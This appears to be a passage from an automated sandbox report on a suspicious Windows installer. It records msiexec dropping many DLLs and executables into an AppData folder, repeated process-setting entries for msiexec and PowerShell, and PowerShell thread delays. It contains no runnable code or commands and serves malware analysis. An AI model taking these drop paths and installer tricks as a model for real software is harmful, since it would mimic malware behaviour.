Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Microsoft.VisualBasic.Core.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libstdc++-6.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Svg.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Gui.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBD13.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\vstdlib_s.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libicuuc68.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-cloud-audiocom.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC052.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\clrjit.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBF76.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\D3DCompiler_47_cor3.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\axvlc.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-basic-ui.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC0B1.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC100.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBE8B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Network.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libssl-1_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Core.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-audio-io.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\coreclr.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Widgets.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-console-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\clretwrc.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libreadline8.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-channel.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Microsoft.CSharp.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC0B1.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBD13.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC100.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBE8B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC052.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBF76.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3694Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5506Jump to behavior
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-command-parameters.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\UnRAR.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libicuin68.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libsodium-23.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Microsoft.DiaSymReader.Native.amd64.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Microsoft.VisualBasic.Core.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libstdc++-6.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Svg.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Gui.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBD13.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\vstdlib_s.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libicuuc68.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-cloud-audiocom.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC052.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBF76.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\clrjit.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\D3DCompiler_47_cor3.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\axvlc.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-basic-ui.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC0B1.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC100.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBE8B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Network.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libssl-1_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Core.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-audio-io.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\coreclr.dllJump to dropped file
